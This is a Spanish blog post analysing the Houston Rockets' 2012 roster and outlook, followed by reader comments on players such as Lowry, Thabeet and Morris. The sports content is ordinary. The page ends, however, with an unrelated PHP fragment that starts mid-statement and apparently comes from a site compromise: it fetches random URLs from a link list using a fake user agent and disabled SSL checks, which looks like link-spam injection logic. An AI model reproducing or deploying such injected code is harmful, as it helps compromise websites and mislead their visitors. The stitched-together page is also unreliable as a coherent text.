Houston Rockets: la vista al frente

22 de January de 2012 por MagicJohnson32

“Ya no te espero”, cantaba Silvio. Con demasiada frecuencia, la espera no vale la pena, y llega un momento en el que hay que soltar amarras y mirar únicamente al frente. Esta temporada, al fin, los Rockets pueden alzar la vista y contemplar un presente -y, sobre todo, un futuro- sin Yao Ming. Tras años condicionados por la salud y el rendimiento del que era su jugador franquicia, sin duda uno de los mejores pívots de los últimos años, la franquicia texana necesitaba pasar página. Con el anuncio oficial de su retirada, los Rockets ya no esperan a Yao.

kylowY lo que se han encontrado al levantar la mirada es una plantilla resultona, con varias virtudes, algunos defectos y una gran carencia: una estrella. Se podría decir que todo lo demás lo tienen, empezando por un base extraordinario. Poco a poco, Kyle Lowry va obteniendo el reconocimiento que merece. Después de varias campañas ejerciendo discretamente de suplente en Memphis y Houston, la lesión de Aaron Brooks al inicio de la pasada campaña le abrió la puerta a la titularidad, y Lowry se transformó. De pronto empezó a anotar triples, algo en lo que siempre se había mostrado mediocre (pasó de 37 triples y un 27% de acierto en la 09-10 a 129 y un 38% en la 10-11), y a firmar actuaciones estelares cada vez con mayor frecuencia. Su rendimiento en este arranque de temporada confirma que estamos ante uno de los mejores bases de la liga, buen anotador, notable defensor y asistente brillante.

Lowry es una de las tres piezas principales de estos Rockets. Las otras dos siguen vistiendo esta camiseta por el veto al traspaso de Chris Paul. De lo contrario, ni Kevin Martin ni Luis Scola seguirían en Houston, y en su lugar estaría Pau Gasol. Martin vuelve a ser el escolta titular, y ya sabemos cuál es su aportación al equipo: puntos. El año pasado se fue hasta los 26 por noche, gracias especialmente a su capacidad para anotar en transición y para irse a la línea de tiros libres, especialidad en la que es uno de los mejores de la liga. Por lo demás, Martin es uno de los peores defensores exteriores de la NBA, y muy discreto en los aspectos restantes. Scola, por su parte, tampoco destaca precisamente por su capacidad defensiva y, aunque es un buen reboteador, sufre para frenar tanto a interiores fuertes y grandes como a los que pueden anotar desde el perímetro. Sin embargo, en ataque no se resiente de su falta de centímetros y utiliza sus magníficos movimientos en el poste y un consistente lanzamiento de media distancia para generar anotación con muy buenos porcentajes.

El trío Lowry, Martin, Scola representa lo que son estos Rockets. Pueden aportar cerca de 60 puntos por partido y tumbar a cualquier equipo, pero las carencias defensivas y la ausencia de un jugador verdaderamente desequilibrante van a obligar al equipo a dar lo mejor de sí mismos para no quedarse descolgado muy pronto de la siempre exigente lucha por los Playoffs de la Conferencia Oeste.

Tras su apuesta fallida por Marc Gasol, a quien le firmaron una offer-sheet que los Grizzlies igualaron, los Rockets han remendado el agujero en la posición de pívot con la incorporación de Dalembert, uno de los mejores reboteadores y taponadores de la liga. Al ex Sixers le ha llevado más tiempo de lo esperado pero ya se ha hecho con la titularidad, lo que ha disparado su rendimiento. Al mismo tiempo que McHale introdujo en el quinteto a Dalembert, en plena racha de derrotas, el técnico decidió también cambiar a su 3 titular. Chase Budinger no ha logrado asentarse y parece haber dado un paso atrás respecto a sus dos prometedoras primeras temporadas, así que McHale le dio la oportunidad al rookie Chandler Parsons, quien había dejado algunas buenas impresiones en los pocos minutos de scomartinque había dispuesto hasta entonces. Con la irregularidad propia de un novato, Parsons está mostrando unas más que interesantes cualidades, especialmente para un segunda ronda, con una altísima actividad en pista y aportación en casi todos los apartados del juego. La tercera vía para la posición de alero titular sería Terrence Williams, indiscutiblemente uno de los jugadores con más talento de la plantilla. Sin embargo, pasan los entrenadores y la irremediable inconsistencia de T-Will le impide contar de verdad para cualquiera de ellos.

La rotación exterior la completan Goran Dragic y en menor medida Johnny Flynn como recambios para Lowry, y Courtney Lee como 2-3 suplente. Por dentro, y con Thabeet ya definitivamente perdido para la causa (es decir, para la NBA), Jordan Hill y sobre todo Patrick Patterson son los únicos que dan minutos de descanso a Scola y Dalembert. Con una rotación tan corta, puede que McHale acabe echando mano del novato Marcus Norris, aunque de momento se resiste a ello.

En definitiva, estos Rockets son una plantilla capaz de competir cada noche pero sin los recursos para ser considerados equipo de Playoffs. Lo importante, sin embargo, es hacer una buena gestión de los recursos de los que dispone ahora mismo la franquicia y aprovechar las ocasiones que se le presentarán en un futuro no muy lejano (para la próxima temporada sólo tienen comprometidos 30 millones, y para la siguiente sólo 16). Si el GM Daryl Morey no dilapida el margen salarial de manera absurda, veremos a los Rockets como unos de los grandes actores de las próximas off-seasons, y entonces tendrán la oportunidad de hacer los deberes y hacerse con la estrella capaz de devolver la franquicia a la elite de la conferencia.

Quinteto: Lowry, Martin, Parsons, Scola y Dalembert.

Sexto hombre:  Lee.

Pronóstico: ligeramente por debajo del 50% de victorias y fuera de Playoffs.

Comenta

11 comentarios a esta entrada

  1. Vader dice:
    #1

    Despues de los Knicks los Rockets son uno de mis equipos favoritos. Espero que les vaya mejor en el futuro, es admirable como logran competir siempre.

    Muy buen artículo, saludos!!

      Citar

  2. Ru dice:
    #2

    Acabo de mirar su situación salarial para las próximas temporadas y es notable la cantidad de Team Options que tienen para la 12/13.Lo curioso del caso es quiénes son esos jugadores: Dalembert,Thabeet,Flynn,Terrence Williams,Patterson y Budinger.Quitando a Dalembert y Patterson,el resto son jugadores dudosos,que no han cumplido con el impacto que se supone que podrian tener,mención especial para los “flops” Thabeet y Flynn.Así que como bien se indica en el análisis tienen un gran margen de mejora si las decisiones desde la genrencia son acertadas.

    Lo de Lowry en fin,yo no lo podía esperar cuando en Memphis veía salir a una especia de “Super Ratón”,aquella serie animada de mi infancia,como rotación en el puesto de PG con un ritmo alocado y sin criterio,el prototipo de combo guard anotador y con poca IQ.El owned que me ha pegado,porque le di muchísima cera es de proporciones mayúsculas.Los Rockets tienen un señor base.

      Citar

  3. melo15 dice:
    #3

    Gran analisis Magic, alguien me puede explicar, porqué jugadores, como Flyyn o Thabett no se pueden recuperar
    Por lo demas, tiene un buen equipo, Lowry es la leche, Martin y Scola tambien, pero me caen fatal.
    Puede que lleguen a Playoffs, porque no?

      Citar

  4. Sancho88 dice:
    #4

    Bueno, puede ser que no estén en playoffs, pero pueden ser aspirantes junto a Utah por la octava plaza. Ahora parece que remonta Dallas, pero no deberían despistarse ni un pelo, porque utah y houston son siempre peleones peleones. Parece, finalmente, que Houston no era aquel solar del que nos hablaban. Kyle Lowry está siendo el mejor base de la liga en cuanto a eficiencia, y es destacable sus porcentajes altísimos tanto en triple (40%), como en tiros libres (91%). Además, aporta rebote defensivo y buenos robos de balón. Si logra implicar en el juego a los interiores del equipo, y sube algo más su ratio de asistencias… ojito. Sobre el puesto de alero. Parsons está bien, pero yo tengo muchísimas ganas de ver al gemelo Morris. Puesto alto del draft y saliéndose en la D-League. Alguien sabe por qué narices no juega con el primer equipo? X-FIles.

    No sé, definitivamente yo les veo algo a estos Rockets. Creo que si Parsons se asienta en la rotación como un tipo impotante, mejoran defensivamente (el 9º peor equipo de la liga), y Scola recupera el nivel de las dos pasadas temporadas… puede haber lucha fraticida en Texas por la octava plaza (Spurs 7º, Mavs 8º y Rocket 9º, actualmente).

      Citar

  5. kantonyo dice:
    #5

    Sancho88:
    Sobre el puesto de alero. Parsons está bien, pero yo tengo muchísimas ganas de ver al gemelo Morris. Puesto alto del draft y saliéndose en la D-League. Alguien sabe por qué narices no juega con el primer equipo? X-FIles.

    Según he leído había interés de repescar a Marcus Morris de la NBDL, pero se lesionó en su cuarto partido en los primeros minutos y lleva una semana de baja… Creo que no es una lesión grave, pero no he encontrado nada que lo confirme.

      Citar

  6. kantonyo dice:
    #6

    Para mi los Rockets tiene una gran base, con jugadores muy comprometidos. Yo intentaría conservar a Lowry, Parson, Scola y Dalembert y el próximo año lanzarme a por algún buen agente libre. Creo que la franquicia de Houston es apetecible para muchos, por su mercado y seguidores es considerada una de las mejores de la liga.

    En el caso de Thabett lo que más me sorprende es que no le hayan dado ni una sola oportunidad… Raro raro para un segundo en el draft.

    Anda que no ha habido jugadores que por ser top5 han tenido 20-30 minutos de media durante 1 o 2 temporadas hasta que han demostrado que no eran validos, y en cambio este jugador no se le da mas de 6-8 minutos por partido….. Si alguien sabe algo sobre este asunto que lo cuente… que a mi no me cuadra.

      Citar

  7. Jose Luis dice:
    #7

    Poned en el título Houston en lugar de Hoston hombre 🙂 por lo demás todo bien chicos

      Citar

  8. MagicJohnson32 dice:
    #8

    Parece que McHale está recortando la rotación, que ahora casi se limita a Lee, Dragic y Patterson. No sé, lo veo demasiado justo como para cargarse a Budinger y T-Will.

    Jose Luis:
    Poned en el título Houston en lugar de Hoston hombre :)por lo demás todo bien chicos

    Corregido. Gracias, Jose Luis.

      Citar

  9. HisRoyalAirness dice:
    #9

    Gran análisis Magic.
    Es un equipo al que yo veo muy flojito y que va a ir perdiendo fuelle a medida que la temporada avance. Por contra, creo que hay equipos que van a ir a más como Utah y los Wolves y pueden quedarse por detrás.

      Citar

  10. Blade Petrovic dice:
    #10

    Los pivots altos siempre suelen ser altas elecciones pero hay uno de 2,31 que fue de 4 ronda supongo q no sabreis qien es?
    Yo si

      Citar

  11. MagicJohnson32 dice:
    #11

    De esa altura, supongo que Muresan o Bol. Creo que Muresan fue 2ª ronda, así que imagino que se trata de Manute.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>